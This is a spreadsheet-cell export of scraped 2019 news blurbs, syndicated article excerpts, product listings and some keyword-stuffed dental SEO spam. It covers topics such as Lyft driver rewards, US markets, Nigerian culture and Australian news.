has had a nearly identical rewards program for drivers since earlier this year. On the company’s platinum and diamond tiers, drivers can see a trip duration and direction. Have you used Lyft or Uber rewards? Get in touch with this reporter at grapier@businessinsider.com. Here’s the full rewards chart for Lyft: READ SOURCE The post Lyft is finally giving some drivers one of their most requested features – Business Insider India appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>The Age's View</t>
  </si>
  <si>
    <t>The broadcaster became very much a part of many of the state's and nation's biggest news stories, debates and events.</t>
  </si>
  <si>
    <t>Support for Mark Zuckerberg mission to reshape global finance is slipping away slowly but surely When Facebook announced plans to launch a digital currency earlier this summer, it added a full-blown revolution in global finance to its typically-vaulting Silicon Valley mission statement: to create a digital currency alongside its efforts to bring the world closer together through networks.Over the past month, that mission has gone badly awry. The Libra cryptocurrency project now faces existential threats from world leaders and central bankers worried about its harmful potential: as a vehicle for money laundering, a threat to global financial stability, open to data privacy abuse, dangerous for consumers and stripping nations of the control of their economies by privatising the money supply. Continue reading… Read More</t>
  </si>
  <si>
    <t>The Australian government feels itself required to help increasingly frenzied US President Donald Trump to build a conspiracy theory.</t>
  </si>
  <si>
    <t>Four months before party members cast their first vote, some 19 contenders remain in the wide-open field vying to win the Democratic presidential nomination, or what some might call the worst job in the world — a months-long marathon of jeers, sneers and abuse from an emboldened and entrenched Donald Trump, with absolutely no guarantee they will come out in front next November.</t>
  </si>
  <si>
    <t>The Dow Jones stagnated on Wednesday as evidence continued to mount that the US economy is slowing. Weak retail sales data didn’t have much of a direct impact on the Dow, but it reinforced the view that the Fed will have to increase stimulus in the economy. In the background, a US bill providing political support to protesters in Hong Kong threatens to derail positive progress in President Donald Trump’s trade war with China. Adding to stock market concerns, Trump’s comments at a meeting with the Italian prime minister prompted fresh concerns about a US-EU trade war. Dow Jones Rally Slowed by Weakening US Consumer &amp; Trade Concerns Heading toward Wednesday’s close, the Dow Jones Industrial Average had dipped 28.08 points or 0.1%, edging below the 27,000 level to 26,996.72. The Dow Jones fell slightly on Wednesday as retail sales and trade concerns dulled the optimism from Tuesday’s stellar earnings. | Source: Yahoo Finance A minor bout of selling infected other US stock indices too, as the Nasdaq (-0.39%) and S&amp;P 500 (-0.23%) trailed the Dow Jones. Commodity prices were generally higher as both oil and gold prices rallied amid a weaker US dollar, which was punished by the rising probability of additional Fed easing. Adding to the USD’s struggles, hopes of a Brexit deal between the UK and European Union sent the euro and British pound higher. It is impossible to ignore the fact that domestic data in the US continues to trend in a negative direction. While the Dow Jones has so far proven remarkably resilient to this trend, analysts continue to be increasingly concerned about problems for the most critical pillar of the economy, the US consumer. The Fed’s Beige Book did not affect the Dow, although it showed businesses slightly lowering their growth outlooks. Chief International Economist James Knightley at ING had the following to say about the bearish direction of consumer trends: “The disappointing run of US data has continued with today’s retail sales numbers for September, which posted the first decline for seven months. Rather than rise 0.3% month-on-month as expected, they actually contracted 0.3% with the report showing broad-based weakness.” ING’s James Knightley believes weak retail sales show the US consumer is cracking. | Source: THINK ING It is when you cross over employment with wage growth that the weakness looks increasingly concerning. Knightley goes on to note his concern that retail spending is cracking under the pressure of keeping the economy afloat. He wrote: “With the rate of employment growth clearly slowing and the latest wage growth coming in much softer than expected, there are have been valid questions regarding how long consumer spending can continue to prop up the economy. Today’s report is not encouraging.” Trump-China-EU Trade War Risks Loom over Stock Market One of the main fundamentals driving the recent rally in the Dow has been an apparent detente between the US and China in their trade war. Trump announced a “phase one” deal, but so far, China has appeared to be reluctant to commit. Any progress that has been made is now even more at risk as the Hong Kong crisis threatens to envelop trade talks. Dow Jones bulls will be hoping that Trump succeeds in forcing through a meaningful trade deal before he has to confront China directly on this issue. On another trade front, comments made by Trump reiterating his concerns about “unfair” EU trade practices have the stock market on edge about further tariffs being imposed on Europe. The prospect of the three largest economic areas in the world engaged in a multi-pronged trade war might make even the IMF’s miserable global growth outlook look unreasonably optimistic. Dow Stocks: Boeing &amp; Disney Bounce, Apple Struggles It was a generally weak day for the Dow 30, save for some strong individual performances from core stocks. Boeing was 0.11% higher for no clear reason after the United Airlines chief stated that he had no idea when the 737 Max might be making its return. Perhaps it was the talk of a “revolutionary” new engine that had bulls ready to speculate again. Disney was outperforming with a 0.76% rally as buzz continues around its new streaming service. Apple stock took a breather after its impressive run, dipping 0.57%. UnitedHealth Group dropped 0.92% after its massive rally on earnings yesterday, while Johnson &amp; Johnson continued to press higher, leading the DJIA with a 1.67% advance. After hitting record highs yesterday, JPMorgan Chase ticked 0.09% lower as yields dropped following the retail sales data release. Click here for a live Dow Jones Industrial Average chart. This article was edited by Josiah Wilmoth.</t>
  </si>
  <si>
    <t>Katherine Acquavella</t>
  </si>
  <si>
    <t>The Brewers 2019 season came to a devastating end Tuesday night when they lost to the Nationals in the NL Wild Card Game. In a crazy eighth inning, All-Star reliever Josh Hader coughed up a two-run lead and an error by rookie outfielder Trent Grisham allowed the deciding run to score. Their unconventional pitching plan had worked for almost the entirely of the game, but with the swing of Soto’s bat, the club’s season was on the brink of ending much earlier than they hoped. Before Soto’s three-run scoring at-bat, the Brewers were just four outs away from advancing to their second straight NLDS. In the ninth inning, Nats closer Daniel Hudson only had to face four batters (11 pitches) to secure the save. “The inning was an ugly inning,” Brewers manager Craig Counsell said after the game. “Crazy things happen.</t>
  </si>
  <si>
    <t>Perhaps the most intriguing galloper of all to pitch up in Melbourne last weekend was not one of the other better known candidates this spring carnival.</t>
  </si>
  <si>
    <t>Watch Road to the Olympic Games, our weekly program spotlighting best high-performance athletes from Canada and around the world. On this week’s edition of the program, watch coverage from the FIVB men’s volleyball World Cup in Hiroshima, Japan. CBC | Sports News</t>
  </si>
  <si>
    <t>You are viewing the 200w 118mm Jacketed Clear Infrared Catering Lamp – R7s from Prolite. Designed for use within the catering industry to keep food warm in kitchen or restaurant applications. The Infrared lamp can also be used within space heaters, drying processes, shrink packaging, laminating and sealing equipment. The Jacketed version offers greater safety in commercial environments by adding a quartz glass sleeve that protects the inside from any outside contact that may cause hotspots and early failure, but also prevents glass shards from falling into food if the bulbs shatter. We advise that you check the length of the bulbs before ordering as some catering lamps are available in 220mm. General Characteristics: Wattage [W] = 200w Voltage [V] = 240v Dimmable = Yes Average Rated Life [Hours] = 5000 Length [mm] = 118 Diameter [mm] = 10 Manufacturers Part No (where applicable) : INF6424-200JKT This Prolite product is available for just £6.90 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>Syrian Kurds claim fighting is continuing in at least one town in the country's north despite Turkey agreeing to a five-day ceasefire. US President Donald Trump is dismissing the ceasefire breach with his administration confirming it is "minor sniper and mortar fighting". Image: AP</t>
  </si>
  <si>
    <t>English Hungarian Hangman game – select either to guess the English or the Hungarian word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Hungarian Hangman →</t>
  </si>
  <si>
    <t>Bellinda Kontominas</t>
  </si>
  <si>
    <t>After watching their home burn on the news, Tina Hag, Robert Collier and their four children return to Rappville, wondering about the future of their northern New South Wales town, which lost 15 homes and 20,000 hectares of grazing land to a bushfire.</t>
  </si>
  <si>
    <t>BROADCASTER Robin Bailey has celebrated the life of her late husband Sean Pickwell in an emotional farewell with their joint family and friends in Brisbane.</t>
  </si>
  <si>
    <t>A man who sold a shotgun that was later used by the Brighton siege gunman says he had the firearm to protect himself from disgruntled former employees.</t>
  </si>
  <si>
    <t>Quinn Campbell</t>
  </si>
  <si>
    <t>On Wednesday, a manslaughter charge against Danny Scout was stayed, ending the six-week long trial for Scout and co-accused Rylan Twigg.</t>
  </si>
  <si>
    <t>(CNN) — From email scams to oil spills and charlatan Pentecostal preachers, it’s clear that Nigeria has something of an image problem. While the outside world’s perception of Africa’s most populous country hasn’t always been overwhelmingly positive, there’s plenty more to this nation than its unsavory associations. With its vibrant culture, sense of humor and adaptability, Nigeria has become the “Giant of Africa” in more ways than just population size. In honor of Nigeria’s Independence Day on October 1, here are 10 of the many reasons why the destination one in five Africans call home stands out from the rest. You may be inspired to add Nigeria to your travel list: Traditional weddings In Nigeria, if you’ve reached your 30th birthday and are still unhitched, the elders will harass you down the aisle, which is why barely a week goes by without someone staging a traditional wedding ceremony somewhere. Weddings are a sacred part of cultural life, but also an excuse to show off cuisine, fabulous clothing, music and dance moves in one life-affirming, chromatic bonanza. With 250-odd ethnic groups, the ceremonies come in a variety of styles, depending on your region. In the southwest, the groom and his friends might prostrate themselves at the start. However, in the southeast you’ll see them dancing their way into the ceremony, wearing bowler hats and clutching walking canes. In other regions, the bride and groom’s families send each other letters of proposal and acceptance before getting down to dowry negotiations. Once the serious stuff is done, it’s back to music and dancing and, best of all, the tossing of banknotes in the air to make money literally rain down on the newlyweds. If you haven’t experienced a traditional Nigerian wedding, you haven’t experienced Nigeria. Jollof rice This mouth-watering tomato-based rice dish is a party staple. There are many ways to cook it, involving endless permutations of meat, spices, chilli, onions and vegetables. While it’s widely accepted that Senegal invented this dish, the concept spread to West African countries. The most notable are Ghana and Nigeria — two nations that have vied with one another for supremacy in a never-ending battle known as the jollof wars. Nigerians are the indisputable champions, of course, serving up “advanced level” jollof that our Ghanaian rivals can only watch and admire. Oya, come chop! Eating chicken to the bone While we’re still on the subject of food, Nigerians are champions at eating chicken to the bone and beyond. It’s not enough to simply eat the flesh. We break the bone, suck out the marrow and pulverize the remainder until there’s almost nothing left. If your chicken thigh is still forensically identifiable at the end of the meal then you haven’t done it right. Abeg, finish am! Nollywood films Nigeria’s filmmakers are famously prolific. Florian Plaucheur/AFP/Getty Images Only Hollywood and India’s Bollywood make more movies than Nigeria. Known as Nollywood, our film industry is big business — so big it contributes 5% to national GDP. With average flicks churned out in under a two weeks, Nollywood films are famous for their poor (albeit improving) production values. But what they lack in sophistication they make up for in story lines that are an entertaining window on Nigerian moral values and byzantine social dynamics. Narratives exploring servant-master relationships, the supernatural, corruption and infidelity are delivered with lashings of shouty, eye-bulging overacting. The movies draw a big audience in the rest of Africa, where viewers from more reserved societies can revel vicariously in Nigeria’s outlandishness and even pick up some of our slang. Nigerian soft power has never been greater. Durbar royal horse parade Celebrated in some northern cities, Durbar marks the end of Ramadan. Stefan Heunis/AFP/Getty Images The annual Durbar festival is the cultural highlight of Nigeria’s Islamic north. This visual extravaganza is celebrated by thousands of peoples, mainly from the Hausa-Fulani ethnic groups, in multiple cities at the end of Ramadan. Followed by a parade that takes place in the city of Kano at the Emir’s Palace, it’s become a longstanding tourist attraction. The Emir’s sons, noblemen and regiments show their loyalty by trooping past on horses, accompanied by musicians. Each royal household has its own unique costume, made up of billowing robes and turbans that glitter in every color under the sun. Wearing black leather gloves, the princes raise a “power” fist as they bounce past the Emir. Being polygamous, the Emirs have literally dozens of sons and every one of them takes part, from the middle-aged to the toddlers. Counting them all is part of the fun. Optimism Street celebrations in the northern city of Kano. Luis Tato /AFP/Getty Images For all its political and economic troubles, Nigerians are somehow still among the most optimistic and happy people on the planet. Opportunity doesn’t come knocking — we chase it, with the help of God, who we all know is on our side. The Lord may have rested on the seventh day of Earth’s creation, but that’s the last day off he’s enjoyed ever since. Nigerians call upon Him 24/7, praying and pumping fists and demanding His favors. Evidence of our optimistic spirit lies everywhere: It’s in the billboards that promise “a divine upgrade”, or our hustling entrepreneurial spirit, or the crumbling roadside shacks grandly named “Victory Plaza.” There’s no room for despair when we see ourselves as “temporarily embarrassed millionaires” (to quote Steinbeck) on the expressway to heaven. So next time a Nigerian tells you “I will become the greatest by force!” understand that they’re not bragging — they’re just speaking their dreams into existence. Proverbial sense Proverbs are a big part of Nigerian culture. Pixabay / Creative Commons Nigerians love a good proverb and we never stop inventing new ones. Some aphorisms are blunt and to-the-point. Others can be a little cryptic, so you sometimes need a high level of “proverbial sense” to understand what they’re getting at: “Monkey no fine but im mama no like am [The monkey might be ugly but his mother loves him].” “If you can’t dance well, you’d better not get up.” “The man being carried does not realize how far away the town really is.” “The quarrel that doesn’t concern you is pleasant to hear about.” “The whip hits at the legs, not the guilt.” “Until lions have their historians, tales of the hunt shall always glorify the hunters.” “The one-eyed man does not thank God until he sees a blind man.” “Rat wey get only one hole, they quick die [A rat with just one hole will soon die].” “After God, fear woman.” “No license for nonsense [behave yourself].” “No business, no wife.” “Keke [motorized tricycle] today, private jet tomorrow!” Masquerades Masquerades appear at Nigerian festivities. Pius Utomi Ekpei/AFP/Getty Images Masquerades are a huge aspect of Nigerian culture. These masked costumed figures are considered to embody the spirits, and serve as a fundamental part of Nigerian pre-colonial religious tradition. Nowadays they double up as entertainment and appear during weddings and festivals, particularly at Christmas time. Nigeria has over 250 ethnic groups, each with its own masquerade. The masks and costumes are visually striking. They can be made from a variety of materials such as grass, animal horns and teeth, and the young men who wear them sometimes cover their limbs in black palm oil to mesmerizing and scary effect. The masquerades travel through the villages, performing dances, acrobatics and reciting incantations. Chasing terrified villagers with bows and arrows or whips is also part of the tradition, so get ready to move your feet. Bronze sculptures Plaques forming part of the Benin Bronzes on display at the British Museum. Dan Kitwood/Getty Images Europe The famous Benin Bronzes are a collection of plaques and sculptures that once decorated the royal palace of the Kingdom of Benin. Dating back to the 13th century, these exquisite artworks include bas-relief images of dignitaries or warriors. They were influenced by the Ife civilization nearby, which produced life-sized bronze heads of the Ooni (king) and his queens. When Europeans first saw the Hellenic-style realism of the Ife sculptures they were “shocked” that Africans could produce such beauty and sophistication. The British liked the Benin bronzes so much they stole them during punitive raids in 1897 and have kept hold of them to this day. Some of the best specimens are displayed at the British Museum in London, the Louvre in Paris and Berlin’s Ethnological Museum. Making the best of ‘go slows’ (traffic jams) Nigeria is notorious for traffic congestion. Pius Utomi Ekpei/AFP/Getty Images Traffic jams — known as go slows — are a daily part of life on Nigeria’s roads, but although they may delay your journey they needn’t stop you from completing your day’s shopping from the comfort of your vehicle. Need some socks? Street vendors can sort you out. They’ll also sell handkerchiefs, belts, books, newspapers, fruit, vegetables, chocolates, electrical appliances and even oil paintings — if that’s what you’re after. Simply roll down your window and call for their attention. Noo Saro-Wiwa is the author of “Looking For Transwonderland: Travels in Nigeria,” which was selected as the Sunday Times Travel Book of the Year in 2012. She was named one of “The World’s 30 Most Influential Female Travelers” by Condé Nast Traveler Magazine in 2018. 10 things Nigeria does better than anywhere The post 10 things Nigeria does better than anywhere appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Unlock your inner 'Pan Solo' with this new Star Wars cookware collection I had been aware of similar effects on productivity reportedly brought about by intermittent fasting, but without conclusive scientific results, I had been … Original Source Follow us on Twitter Amazon’s 30 FREE Trials The post Unlock your inner 'Pan Solo' with this new Star Wars cookware collection appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Attorney John Dowd used the much-maligned font this week in a letter informing the House Intelligence Committee members that his clients would not be submitting to their demands.</t>
  </si>
  <si>
    <t>Mal Chenu</t>
  </si>
  <si>
    <t>From the moment a child gets a gold star on their finger-painting masterpiece, you know they are gifted. Or at least very clever.</t>
  </si>
  <si>
    <t>You can filter jobs based on the distance from your selected city. The distance can be set from 10 to 500 kilometres. Keyboard users: When the map is in focus, use the arrow keys to pan the map and the plus and minus keys to zoom. The maximum paid by Sun Life Assurance Company of Canada per policy year on the insured portion of the Dental Plan is $750. 1 Percentage of Provincial Dental Fee Guide Cost for General Practitioners (in the province where service was performed). Locate and compare Dentists in Vaughan ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. 7 reviews of Toronto Head and Neck Clinic "They have some administration issues. Not very responsive and they lost my initial referral. Be prepared for the possibility of clerical errors. I did not have any major issue with the doctor. In. You can filter jobs based on the distance from your selected city. The distance can be set from 10 to 500 kilometres. Keyboard users: When the map is in focus, use the arrow keys to pan the map and the plus and minus keys to zoom. Highest Rated Dental Clinic In Vaughan Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Vaughan. We're the original doctor ratings site with over 2 million reviews. Name Toggle navigation Menu Find A Doctor Find A Facility Health News Health Forum Best. San Francisco Dental Implant Center Announces Updates to Page on Cost of Dental Implants in San 1. Your efforts for assuring great. For instance, if you have a dental clinic, users are most likely to ask “Dental clinics near me” or “dentists near me” while using voice search. Locate and compare Dental Clinics &amp; Centres in Vaughan Mills Vaughan ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local. Why should you choose dental implants – Only one. dental implants in the world you can get in the Near Eastern and Asian countries. Learn more about it here. Dental Coverage You have access to preventive care with a Plan that offers up to $750 coverage for dental visits per policy year. The current policy year is from Sept. 1, 2019 – Aug. 31, 2020. How Dental Implants are Making a Quick and Permanent Fix for Missing Teeth – Fortunately there are a number of options available. a Day New Teeth in a Day is a dental clinic specializing in one-day multiple dental implant procedures. They have clinics in numerous locations, The lack of affordable dental care – or any dental care – is one reason the ACORN clinic in Union County sees so many. Welcome to Vaughan Mills Sleep Dentistry Dr. Bryan N. Waxman, Specialist, Dental Anesthesia We are a Dental Speciality Practice limited to providing high quality dental treatment to children and adults aged 2 and older who require Deep Sedation.</t>
  </si>
  <si>
    <t>Isabella Grant will join famous dad Chris at the Western Bulldogs, while Geelong will recruit Millie Brown, the daughter of Paul Brown, as father-daughter picks.</t>
  </si>
  <si>
    <t>The JESUS in me mission posted a photo: Woman Praying with her hands together Recent</t>
  </si>
  <si>
    <t>Halton police say the man ran away from store security at Fortinos after he was arrested.</t>
  </si>
  <si>
    <t>If elected, the party would double the funding for cultural events and festivals in the city.</t>
  </si>
  <si>
    <t>2014 Yaguar F-Type V8 S. Yaguars Erik Jonson 2013 yil uchun eng zo'r, 8 tezlikda ishlaydigan, 495 ot kuchiga ega […] The post 2014 Jaguar F-Type V8 S – Jay Lenoning garaji appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Three scientists have been awarded the 2019 Nobel Prize in Chemistry for the development of lithium-ion batteries. The post Lithium-ion batteries take chemistry Nobel appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>As the Morrison government reveals it is building a budget surplus in case the economy deteriorates.</t>
  </si>
  <si>
    <t>Seth and Elizabeth are joined by their friends, the Hudys, in Bora Bora. This is the second time Cari and Aaron have visited and Bora Bora lived up to the Hhpe! To learn more about our trip halfway around the world, please visit: www.sailblogs.com/member/honeymoon/ The post S/V Honeymoon Bora Bora (Ep16) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Traveling part 2 || london travel tour || dlr travel tour The post Traveling part 2 || london travel tour || dlr travel tour appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>adr8</t>
  </si>
  <si>
    <t>Bilikay T03 Bluetooth HiFi Stereo Earphones Main Features: ● Adopt imported Bluetooth 5.0 chip, ultra-low power consumption without delay transmission ● Independent generation unit with 10mm titanium membrane driver, producing accurate vocals, powerful low frequency and balanced intermediate frequency ● Comfortable and painless, ergonomic design ● IPX4 waterproof design, blocking the erosion of rain and sweat ● Easy to operate, pick up the automatic match and connect to the previously paired device ● Mini charging bin, when you don't use earplugs, store and charge the earbuds, so you can use them whenever you need them ● Charging method: magnetic charging Xiaomi Redmi Airdots AU $25.14 with coupon H3961263DDE1D000 Xiaomi Redmi AirDots TWS Bluetooth Wireless Earphones Main Features: • The headset has a built-in Bluetooth 5.0 chip to be called a new generation of headphones. Redmi AirDots is equipped with the latest Bluetooth 5.0 chip, the data transfer rate is up to 2 times compared to the previous generation, the connection is faster and more stable. Listening to music and playing is smoother and softer •Noise Reduction of 7.2mm Moving Coil Drive Unit and DSP Intelligent Environment Noise Reduction: • when material and setting are the same, the larger the size of the speaker unit, the better of the low frequency • The Redmi AirDots are equipped with a 7.2 mm sound unit, which has a low frequency dip and a medium to high frequency. •Free to adjust, comfortable to wear, not easy to fall • Lightweight and comfortable to wear is the highlight of Redmi AirDots • Thanks to the strict weight control of the single headset at 4.1 g. You do not have to worry about it falling down • We have prepared 3 models of ear protectors to meet your highest demands of closure and firmness, even when running, punching and listening to music. • 4 hours battery life with charging box. Using the time extends to 12 hours. The storage box is also a loading box • The headset can not only be protected and stored, but the headset can be charged twice as much • Automatic second connection • Bluetooth 5.0, the connection is more stable • 12h long battery life, with charging box • Double-ear multifunction button, anti-missing • Summon voice assistant, voice control mobile phone • Comfortable to wear, self-adjusting, not easy to fall off • Headphone Battery Capacity: 40mAh • Charging Box Battery Capacity: 300mAh</t>
  </si>
  <si>
    <t>Leftdrop</t>
  </si>
  <si>
    <t>We are glad to share you 50W 50 LED Flood Spot Light IP65 Waterproof Outdoor Garden Spotlight, the item is easy installation and environmentally friendly and energy-saving. Suitable for outdoor lighting, gardens, squares, billboards, factories, docks, stadiums and other places where lighting is needed. FEATURES Super Bright &amp; Energy Saving: Built with high quality 2835 chips, our LED Flood light is equivalent to 300W Halogen Bulb, saves 80% of your energy as compared to traditional Halogen lamps. Lighten up your atmosphere with our LED Floodlight! Adjustable Bracket: Comes with a dedicated bracket, flexible combination of adjustment angle max 180 degree, it is easy to DIY and fit for most needed. Can be installed on the walls, ground and other locations, by adjusting the different angles. 120° Beam Angle: Spotlight Emitting angle is 120 degrees, to provide farther irradiation distance and more focused beam lighting. Waterproof: IP65 rating waterproof, lightning protection &amp; dust control. Its sealing is perfect. Can be ideal for indoor and outdoor use. (We recommend that you DO NOT submerge it into water.) Long Life: Extremely 10000 hours long life, reduces re-lamp frequency. Durable &amp; Excellent Heat Disspation Material: The mask of this outdoor work light adopts superhard high transparent pc and high-purity aluminum reflective film, the light transmission and reflective is excellent. It adopts thickened die-cast aluminum, not only ensure the strength of the light flood, but also convective the design of the new streamline thermal gets excellent heat dissipation and extend the life of lamp bulbs. More about product details click me -&gt;Flood Spot Light. Thanks.</t>
  </si>
  <si>
    <t>Amid the countdown to a jihad-inspired terror attack on the heart of Melbourne, one of the four men behind the plot made what appeared an everyday visit to a suburban hardware store.</t>
  </si>
  <si>
    <t>There is a forbidding aspect to Penny Wong that makes you think twice about crossing her.</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Canadian antifascist demonstrators block elderly woman’s path as she tries to enter far right rally Democrats subpoena Rudy Giuliani as part of impeachment inquiry Trump may have lied to Mueller about knowledge of campaign’s contacts with WikiLeaks Jamaican reggae artist Louie Rankin who worked with DJ Khaled and DMX dies in car crash in Canada Sopit Soonthorntanasatit, 56, Thailand stuns the internet with her enviable physique Hillary Clinton slams Mike Pompeo for not intervening when Trump tried to ‘extort’ Ukraine for dirt Chelsea Clinton shows off her slim figure after giving birth Canadian antifascist demonstrators block elderly woman’s path as she tries to enter far right rally Posted: 01 Oct 2019 12:17 AM PDT Antifascist activists in Canada became the center of controversy once again over the weekend when they were seen on video blocking an elderly couple’s path as they tried to enter a far right rally. via https://youtu.be/mFQfuwZZ8h8 Democrats subpoena Rudy Giuliani as part of impeachment inquiry Posted: 01 Oct 2019 12:17 AM PDT House Democrats have subpoenaed President Donald Trump’s personal lawyer Rudy Giuliani for documents related to his interactions with Ukrainian officials. via https://youtu.be/mFQfuwZZ8h8 Trump may have lied to Mueller about knowledge of campaign’s contacts with WikiLeaks Posted: 30 Sep 2019 11:37 PM PDT President Donald Trump may have lied to special counsel Robert Mueller about his knowledge of his campaign’s contacts with WikiLeaks, House Democrats claimed in a court filing on Monday. via https://youtu.be/mFQfuwZZ8h8 Jamaican reggae artist Louie Rankin who worked with DJ Khaled and DMX dies in car crash in Canada Posted: 30 Sep 2019 11:22 PM PDT A tweet from Rankin’s verified account read, ‘It saddens us to have to announce that The “ORGINAL DON DADA” “Trail Blazer” the legend – Louie Ox Rankin passed away this morning!’ via https://youtu.be/mFQfuwZZ8h8 Sopit Soonthorntanasatit, 56, Thailand stuns the internet with her enviable physique Posted: 30 Sep 2019 11:12 PM PDT Mother-of-three Sopit Soonthorntanasatit, from Thailand, has stunned thousands of people with her enviable physique. via https://youtu.be/mFQfuwZZ8h8 Hillary Clinton slams Mike Pompeo for not intervening when Trump tried to ‘extort’ Ukraine for dirt Posted: 30 Sep 2019 10:22 PM PDT Former-First Lady Hillary Clinton, 71,spoke out about Secretary of State not stopping the Ukraine conversation during an interview on the Late Show with Stephen Colbert on Monday evening. via https://youtu.be/mFQfuwZZ8h8 Chelsea Clinton shows off her slim figure after giving birth Posted: 30 Sep 2019 10:22 PM PDT Chelsea, 39, was seen leaving her New York City apartment and heading to The Late Show with Stephen Colbert, where she joined her mother, Hillary Clinton. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>The rise comes despite jitters the move will slow spending in the world's third largest economy. The post Japan delivers long-delayed consumption tax hike appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Beach at Covehithe Suffolk Beach at Covehithe Suffolk - Following a very early morning alarm call, I head over to the Suffolk coast to a place called Covehithe, near Southwold.Continue reading The post Beach at Covehithe Suffolk appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>Liv Casben</t>
  </si>
  <si>
    <t>The Berejiklian Government will reportedly be urged to introduce pill testing, and reduce police powers at music festivals on the advice of the state coroner, who oversaw an inquest into the drug-related deaths of six people in NSW.</t>
  </si>
  <si>
    <t>Read more? Click here</t>
  </si>
  <si>
    <t>Thanks for tuning in! In today’s video, E.S. speaks with Salitu about black people finding a home amongst the Nubians in Egypt. I use Airbnb. You should try it! 💕 https://abnb.me/e/AEjE39KYw0 All of my adventures came through Captain Bassam. BOOK YOUR STAY AT ARAGHEED NUBIAN GUEST HOUSE (Tell him who sent you.) https://abnb.me/fxy7VOGkr0 http://www.aragheed.com His […] The post YES, YOU CAN LIVE HERE! | NUBIAN COMMUNITIES IN EGYPT appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Capcom presents Resident Evil at Monster Hunter World: Iceborne in November, and it must be said, he does it in style. Not only the skins of Leon and Claire will win, but you can also dress the Handler as Mr. X. It is absolutely unreal. At the moment, the trailer only exists on Twitter, but we will make sure to add it to this article as soon as it will be available on YouTube. Leon and Claire join the hunt # Iceborne. Be careful though: they are not the only ones wandering in these places … pic.twitter.com/32sAmYf5yq– Monster Hunter (@monsterhunter) October 4, 2019 It also seems that a new zombie emote will be useful in specific battles, although there are not yet concrete details to add. It's a pity that Capcom did not present this material in time for Halloween, but we are always looking forward to hearing more. The craziest crossover of this Monster Hunter is it still? Escape the manager in the comments section below. .</t>
  </si>
  <si>
    <t>The Irish prime minister was speaking after meeting Boris Johnson for Brexit talks in North-West England. Read more? Click here</t>
  </si>
  <si>
    <t>Cody Simpson just released that private song he wrote for Miley…and it’s pretty sweet. Plus, Miley claims she is UNBOTHERED by Liam’s new relationship with Maddison…but i’m not buying it. I’m getting into the nitty gritty, stick around.</t>
  </si>
  <si>
    <t>Portugal's incumbent Socialist government has won at least 106 seats in the 230-seat assembly.</t>
  </si>
  <si>
    <t>They’re already the kings of British TV – but it turns out that one of Ant and Dec has actual royal blood too. Read more? Click here</t>
  </si>
  <si>
    <t>Coronation Street was awarded the Best Show-Stopper award at this year's Inside Soap Awards for...</t>
  </si>
  <si>
    <t>Donal Sheil And Luke Wong</t>
  </si>
  <si>
    <t>It's 5:30pm on a Friday and I've received the location of a mysterious music gig. Are you coming?</t>
  </si>
  <si>
    <t>Just as the coffin was closing on his grandfather, Roosters forward Zane Tetevano threw in a cherished keepsake that meant the world to both of them.</t>
  </si>
  <si>
    <t>The first criminal charges from the Hayne Royal Commission are expected to be laid on Friday. Commonwealth Bank's former life insurance business, CommInsur, is set to be charged by the Commonwealth Director of Public Prosecutions for breaching the ASIC Act. CommInsure - which is still in the process of being purchased by Hong Kong's AIA group - came under fire during the royal commission for making false and misleading statements about coverage for heart attacks in its trauma policy. ASIC is expected to confirm the criminal charges on Friday.</t>
  </si>
  <si>
    <t>With a deeper, more versatile roster, Portland is intent on keeping its eye on the prize of the second championship in franchise history. Source: Sports Business News</t>
  </si>
  <si>
    <t>How long will it be before brokers’ and insurers’ systems are able to connect efficiently? “This is still a two- to three-year journey for the industry to have really-slick, direct connectivity,” predicts Jason Storah, CEO of Aviva Canada. Storah spoke… The post Where Aviva Canada stands on broker connectivity appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Get Dental Treatment From the Best Dentist in Kalyani Nagar – Dr. Amit Thareja – In the near future, we have plans to grow more and extend our services at different locations in Pune. Dr. Tharejas Dental. See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from North Lanarkshire – Scotland. Do you want to know who. An intrepid Airdrie mum who lost her husband to a brain tumour last. The “Cobbler Walk of Hope” follows a challenging. Top Dentist Near Airdrie Alberta Kid Friendly Dental Clinic Near Airdrie Alberta Friendliest Dental Clinic Near Airdrie Alberta Kid Friendly Dentist Near Airdrie Alberta Recent Comments Archives August 2019 July 2019 June 2019 May 2019 April. 2010-03-16 · t h e m a y f i l e s is foremost a family blog, chronicling everyday life. Life including natural, healthy eating (with recipes thrown in at random), home educating (with ideas popping up sporadically), an attempt to homestead on .2 acres (with very meager yields), raising 3 of 4 children with a rare genetic disorder, and lots of highly. 2016-04-22 · What happens during a typical checkup? Well, let us tell you all about it! According to the Canadian Dental Association, about 80% of Canadians visit their dentist at least once each year for a regular dental checkup. Top Dentist Near Airdrie 2010-03-16 · t h e m a y f i l e s is foremost a family blog, chronicling everyday life. Life including natural, healthy eating (with recipes thrown in at random), home educating (with ideas popping up sporadically), an attempt A judge has ruled an Edmonton dentist owes Alberta Treasury Branches more than $5 million after he failed to meet the terms of a loan, prompting the sudden closure of a chain of dental clinics he. This is one of the easiest and best ways to save you money. For example, if your firm has set up a Google Ads campaign to. Glasgow based Auctions, Auctioneers and Valuers of Scottish Land &amp; Property . Our regular programme of 